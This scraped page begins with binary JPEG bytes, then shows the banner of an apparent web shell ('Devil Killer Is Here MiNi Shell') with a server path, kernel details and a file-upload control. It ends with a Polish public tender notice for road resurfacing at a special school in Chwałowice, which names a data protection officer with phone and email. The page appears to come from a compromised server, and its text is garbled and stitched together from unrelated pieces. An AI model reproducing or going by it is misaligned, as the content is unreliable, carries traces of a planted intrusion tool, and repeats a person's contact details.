JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211019/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20211019/0023783401-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> „Remont nawierzchni dróg wewnętrznych na terenie Specjalnego <br/>Ośrodka Szkolno-Wychowawczego w Chwałowicach&#34; </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Specjalny Ośrodek Szkolno-Wychowawczy w Chwałowicach</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 38613625200000</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Chwałowice 247</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Chwałowice</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">27-100</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL921 - Radomski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@sosw-chwalowice.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">sosw-chwalowice.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Remont nawierzchni dróg wewnętrznych na terenie Specjalnego <br/>Ośrodka Szkolno-Wychowawczego w Chwałowicach&#34; </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-1c3d7e27-30f7-11ec-a3fb-0a24f8cd532c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00237834</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-10-19</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00025029/05/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.2 „Remont nawierzchni dróg wewnętrznych na terenie Specjalnego Ośrodka Szkolno-Wychowawczego w Chwałowicach&#34;</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://sosw-chwalowice.ezamawiajacy.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://sosw-chwalowice.ezamawiajacy.pl /servlet/HomeServlet</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">WYMAGANIA TECHNICZNE I ORGANIZACYJNE WYSYŁANIA I ODBIERANIA KORESPONDENCJI<br/>ELEKTRONICZNEJ PRZEKAZYWANEJ PRZY ICH UŻYCIU OPISANE ZOSTAŁY W REGULAMINIE<br/>KORZYSTANIA Z PLATFORMY ZAKUPOWEJ ZAMAWIAJĄCEGO MARKETPLANET POD<br/>ADRESEM https://oneplanet.pl/regulamin</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z<br/>04.05.2016, str. 1), dalej „RODO”, informuję, że: Administratorem danych osobowych jest Specjalny<br/>Ośrodek Szkolno- Wychowawczy w Chwałowicach, Chwałowice 247, 27-100 Chwałowice , tel. (48) 48<br/>616 30 49, adres e-mail: sekretariat@sosw-chwalowice.pl<br/>2. Dane kontaktowe do Inspektora Ochrony Danych: Ilona Kowalczyk, tel.608292823,<br/>email:kancelaria.odo@gmail.com<br/>3. Pani/Pana dane osobowe będę przetwarzane zgodnie z:<br/>a) art. 6 ust. 1 lit. a ogólnego Rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 zdnia27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych<br/>osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE<br/>(zwanego w dalszej części RODO) na podstawie zgody w celu publikacji danych zawartych w umowie<br/>w Elektronicznym Rejestrze Umów,<br/>b) art. 6 ust. 1 lit. b RODO w celu zawarcia i realizacji umowy,<br/>c) art. 6 ust. 1 lit. c RODO w celu wypełnienia obowiązku prawnego ciążącego na Administratorze, tj.<br/>przechowywania danych na podstawie ustawy z dnia 14 lipca 1983 r. o narodowym zasobie<br/>archiwalnym i archiwach (Dz. U. 2020, poz. 164) i Rozporządzenia Prezesa Rady Ministrów z dnia 18<br/>stycznia 2011 r. w sprawie instrukcji kancelaryjnej, jednolitych rzeczowych wykazów akt oraz instrukcji<br/>w sprawie organizacji i zakresu działania archiwów zakładowych (Dz. U. 2011, poz. 1467), d) art. 6 ust.<br/>1 lit. e w celu wykonania zadań i obowiązków w ramach sprawowania władzy publicznej wynikających<br/>z przepisów ustawy z dnia 5 czerwca 1998 r. o samorządzie powiatowym (Dz. U. 2020<br/>poz. 920) i ustaw szczególnych. 4. Pani/Pana dane osobowe będą mogły być przekazywane wyłącznie<br/>podmiotom upoważnionym z<br/>mocy prawa. 5. Pani/Pana dane osobowe będą przechowywane przez okres obowiązywania umowy, a<br/>po jego upływie przez okres niezbędny do umożliwienia jej prawidłowej obsługi, zabezpieczenia lub<br/>dochodzenia ewentualnych roszczeń oraz wypełnienia obowiązku prawnego Administratora, o którym<br/>mowa w pkt. 3 lit. c klauzuli. Okres przetwarzania danych osobowych może zostać każdorazowo<br/>przedłużony jeśli wystąpi inna uzasadniona prawnie potrzeba administratora do przetwarzania tych<br/>danych przez dłuższy okres.<br/>6. Przysługuje Pani/Panu prawo do: a) dostępu do treści danych osobowych, do ich sprostowania oraz<br/>w zakresie wynikającym z przepisów<br/>do ich usunięcia, jak również prawo do ograniczenia ich przetwarzania,<br/>b) wycofania zgody na przetwarzanie danych osobowych, ale cofnięcie zgody nie wpływa na zgodność<br/>z prawem przetwarzania, którego dokonano na podstawie zgody przed jej wycofaniem, c) wniesienia<br/>skargi do organu nadzorczego, jeśli Pani/Pana zdaniem, przetwarzanie danych osobowych narusza<br/>przepisy prawa.<br/>7. Podanie danych osobowych jest dobrowolne, ale niezbędne dla realizacji celu określonego w pkt. 3<br/>klauzuli. Wyrażam zgodę na przetwarzanie dany osobowych przez Administratora, o którym mowa w<br/>pkt. 1 w celu wskazanym w pkt. 3 klauzuli</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">SOSW1/21-15/2020/21</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający uwzględnił wymagania w zakresie dostępności dla osób niepełnosprawnych oraz projektowania z przeznaczeniem dla wszystkich użytkowników, zgodnie z art. 100 ust. 1 ustawy</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> „Remont nawierzchni dróg wewnętrznych na terenie SpecjalnegoOśrodka Szkolno-Wychowawczego w Chwałowicach&#34; realizowany w ramach zadania<br/>inwestycyjnego pn.: „Przebudowa i rozbudowa budynku Specjalnego Ośrodka Szkolno Wychowawczego w Chwałowicach wraz z zakupem pierwszego wyposażenia ośrodka oraz<br/>budowa przy budynku ośrodka mini obserwatorium astronomicznego i amfiteatru”Zakres robót –<br/>bez wykonania nowej podbudowy:<br/>1. Oczyszczenie mechaniczne warstw konstrukcyjnych nieulepszonych2. Skropienie<br/>mechaniczne warstw konstrukcyjnych niebitumicznych emulsją asfaltową w ilości<br/>0,5 kg/m2.<br/>3. Wykonanie warstwy wyrównawczo-wiążącej AC16W 35/50; średnia grubość po zagęszczeniu<br/>4cm dla kategorii ruchu KR1-2.<br/>4. Oczyszczenie mechaniczne warstw konstrukcyjnych ulepszonych bitumem<br/>5. Skropienie mechaniczne warstw konstrukcyjnych bitumicznych emulsją asfaltową w ilości 0,3<br/>kg/m2<br/>6. Wykonanie warstwy ścieralnej AC11S 50/70 grubość po zagęszczeniu 4cm, dla kategorii<br/>ruchu KR1-2<br/>Zakres robót – z wykonaniem nowej podbudowy:<br/>1. Rozebranie nawierzchni z trylinki gr. 15cm, spoiny wypełnione piaskiem, wraz z wywiezieniem<br/>i utylizacją gruzu.<br/>2. Koryto wraz z profilowaniem i zagęszczeniem mechanicznym podłoża pod warstwy<br/>konstrukcyjne nawierzchni, głębokość koryta do 10cm.<br/>3. Wykonanie podbudowy zasadniczej z kruszywa łamanego stabilizowanego mechanicznie<br/>frakcji 0-31,5mm; grubość warstwy po zagęszczeniu 20cm<br/>4. Oczyszczenie mechaniczne warstw konstrukcyjnych nieulepszonych<br/>5. Skropienie mechaniczne warstw konstrukcyjnych niebitumicznych emulsją asfaltową w ilości<br/>0,5 kg/m2<br/>6. Wykonanie warstwy wiążącej AC16W 35/50; grubość po zagęszczeniu 4cm dla kategorii<br/>ruchu KR1-2<br/>7. Oczyszczenie mechaniczne warstw konstrukcyjnych ulepszonych bitumem<br/>8. Skropienie mechaniczne warstw konstrukcyjnych bitumicznych emulsją asfaltową w ilości 0,3<br/>kg/m2<br/>9. Wykonanie warstwy ścieralnej AC11S 50/70 grubość po zagęszczeniu 4cm, dla kategorii<br/>ruchu KR1-2 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233142-6 - Roboty w zakresie naprawy dróg</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45233140-2 - Roboty drogowe</p> <p class="mb-0">45233220-7 - Roboty w zakresie nawierzchni dróg</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">2 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty zamawiający będzie kierował się<br/>następującymi kryteriami i odpowiadającymi im znaczeniami oraz w następujący sposób będzie oceniał<br/>spełnienie kryteriów:<br/>Lp. Kryterium Znaczenie<br/>1. C – cena brutto oferty 60% 2. G – okres gwarancji jakości i rękojmi na cały zakres zamówienia 40%Razem 100%<br/>Łączna ocena punktowa (S) obliczona zostanie wg wzoru:<br/>S = C + G<br/>1) Ofertę, która uzyska najwyższą ilość punktów Zamawiający uzna za najkorzystniejszą .<br/>2) Oferty oceniane będą punktowo.<br/>3) Łączna ocena oferty stanowi sumę punktów otrzymanych za poszczególne kryteria ocenianej oferty.<br/>Maksymalna ilość punktów jaką może osiągnąć oferta wynosi 100 pkt.<br/>4) W trakcie oceny ofert kolejno porównywanym i ocenianym ofertom przyznawane są punkty za<br/>poszczególne kryteria według następujących zasad:<br/>5.2 Kryterium - cena brutto oferty.<br/>Cena brutto oferty określona w formularzu ofertowym. Wykonawca, który zaproponuje najniższą cenę<br/>brutto oferty zgodnie z formularzem ofertowym, otrzyma maksymalną liczbę punktów za to kryterium, tj.<br/>60 punktów.<br/>Pozostałym Wykonawcom punkty zostaną przyznane w następujący sposób:<br/>Oferty nie podlegające odrzuceniu będą oceniane według wzoru:<br/>Cn<br/>PC = ------- x 60 pkt, 1pkt = 1%<br/>Cb<br/>gdzie,<br/>PC - ilość punktów za kryterium cena,<br/>Cn - najniższa cena ofertowa spośród ofert nieodrzuconych,<br/>Cb – cena oferty badanej.<br/>5.3 Kryterium – okres gwarancji jakości i rękojmi na cały zakres zamówienia.<br/>Gwarancja zostanie udzielona na rzecz finalnego odbiorcy produktu tj. Zamawiającego i potwierdzona<br/>pisemnie, ze wskazaniem nazwy realizowanej inwestycji.<br/>Okres udzielonej przez Wykonawcę gwarancji jakości i rękojmi na cały zakres zamówienia nie może<br/>być krótszy niż 36 miesięcy oraz dłuższy niż 60 miesiące.<br/>Zamawiający w tym kryterium przydzieli punktację według poniższego wzoru:<br/>Lp. Okres gwarancji jakości i rękojmi na cały zakres zamówienia<br/>Ilość punktów<br/>1. nie mniej niż 36 m-cy 0<br/>2. 48 m-cy 20<br/>2. 60 m-cy 40<br/><br/>1 pkt = 1%<br/>UWAGA!<br/>Wykonawca określi czas trwania gwarancji w jednym z powyższych okresów. Zadeklarowanie czasu<br/>trwania gwarancji i rękojmi w innym terminie będzie skutkować odrzuceniem oferty Wykonawcy przez<br/>Zamawiającego, jako niezgodnej z treścią SWZ na podstawie art. 226 ust. 1 pkt 5 ustawy Pzp. W<br/>przypadku gdy Wykonawca nie zaoferuje żadnego terminu gwarancji Zamawiający przyjmie, iż<br/>zaoferował minimalny tj. 36 m-cy od dnia podpisania umowy.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji i rękojmi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,0</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 3</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 6</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Na podstawie art. 112 ustawy Pzp, zamawiający określa warunki udziału w postępowaniu dotyczące:<br/><br/>1.	ZDOLNOŚCI DO WYSTĘPOWANIA W OBROCIE GOSPODARCZYM:<br/>Zamawiający nie określa warunków w ww. zakresie.<br/><br/>2.	UPRAWNIEŃ DO PROWADZENIA OKREŚLONEJ DZIAŁALNOŚCI GOSPODARCZEJ LUB ZAWODOWEJ, O ILE WYNIKA TO Z ODRĘBNYCH PRZEPISÓW:<br/>Zamawiający nie określa warunków w ww. zakresie.<br/><br/>3.	SYTUACJI EKONOMICZNEJ LUB FINANSOWEJ:<br/>Zamawiający nie określa warunków w ww. zakresie.<br/><br/>4.	ZDOLNOŚCI TECHNICZNEJ LUB ZAWODOWEJ: <br/>a)	doświadczenie wykonawcy:<br/>Warunek zostanie uznany za spełniony, jeżeli wykonawca wykaże wykonanie w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy (a w przypadku świadczeń okresowych lub ciągłych nadal wykonuje)- w tym okresie, co najmniej 1 roboty budowlanej polegającej na budowie, przebudowie, rozbudowie drogi użyteczności publicznej o wartości nie mniejszej niż <br/>60 000.00 zł <br/>Uwaga: <br/>1.	Wykonawca zobowiązany jest wyodrębnić rodzajowo i kwotowo roboty, <br/>stanowiące podstawę wykazania doświadczenia;<br/>2.	Dla potrzeb oceny spełniania warunku określonego powyżej, jeśli wartość lub wartości zostaną podane w walutach innych niż PLN, Zamawiający przyjmie średni kurs danej waluty publikowany przez Narodowy Bank Polski w dniu publikacji ogłoszenia <br/>o zamówieniu w Biuletynie Zamówień Publicznych, jeżeli w dniu publikacji ogłoszenia <br/>o zamówieniu w Biuletynie Zamówień Publicznych, Narodowy Bank Polski nie publikuje średniego kursu danej waluty, za podstawę przeliczenia przyjmuje się średni kurs waluty publikowany pierwszego dnia, po dniu publikacji ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych, w którym zostanie on opublikowany.<br/><br/>b)	kwalifikacje zawodowe kadry technicznej:<br/>Wykonawca powinien wykazać, że dysponuje lub będzie dysponować: <br/>- co najmniej jedną osobą posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w specjalności konstrukcyjno- budowlanej posiadającego aktualne na dzień składania ofert zaświadczenie o przynależności do Polskiej Izby Inżynierów Budownictwa, (Kierownik Budowy).<br/>** Kierownik budowy oraz kierownicy robót powinni posiadać ważne uprawnienia budowlane, o których mowa w ustawie z dnia 7 lipca 1994 r. Prawo budowlane (Dz. U. z 2020 r. poz. 1333 ze zm.) oraz w Rozporządzeniu Ministra Inwestycji i Rozwoju z dnia 29 kwietnia 2019 r. w sprawie przygotowania zawodowego do wykonywania samodzielnych funkcji technicznych w budownictwie (Dz.U. z 2019 r. poz. 831) lub odpowiadające im kwalifikacje nadane na podstawie uprzednio obowiązujących przepisów prawa lub odpowiednich przepisów upoważniające do kierowania robotami budowlanymi w zakresie objętym przedmiotem zamówienia. W przypadku Wykonawców zagranicznych dopuszcza się również kwalifikacje zdobyte w innych państwach, na zasadach określonych w art. 12a ustawy prawo budowlane, z uwzględnieniem postanowień ustawy z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz.U. z 2020r. poz. 220). <br/>- Zamawiający może, oceniając zdolność techniczną lub zawodową, na każdym etapie postępowania, uznać, że wykonawca nie posiada wymaganych zdolności, jeżeli posiadanie przez wykonawcę sprzecznych interesów, w szczególności zaangażowanie zasobów technicznych lub zawodowych wykonawcy w inne przedsięwzięcia gospodarcze wykonawcy może mieć negatywny wpływ na realizację zamówienia na każdym etapie postępowania (art. 116 ust. 2 ustawy Pzp). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zgodnie z art. 274 ust. 1 ustawy Pzp, zamawiający przed wyborem najkorzystniejszej oferty wezwie<br/>wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie<br/>krótszym niż 5 dni od dnia wezwania, aktualnych na dzień złożenia, następujących<br/>podmiotowychśrodków dowodowych:potwierdzających brak podstaw wykluczenia:a) oświadczenia<br/>wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy<br/>kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz.<br/>U. z 2020 r.poz. 1076 ze zm.), z innym wykonawcą, który złożył odrębną ofertę, ofertę częściową lub<br/>wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej<br/>grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty,<br/>ofertyczęściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego<br/>wykonawcy należącego do tej samej grupy kapitałowej – wg Załącznika nr 5;b) odpisu lub informacji z<br/>Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności 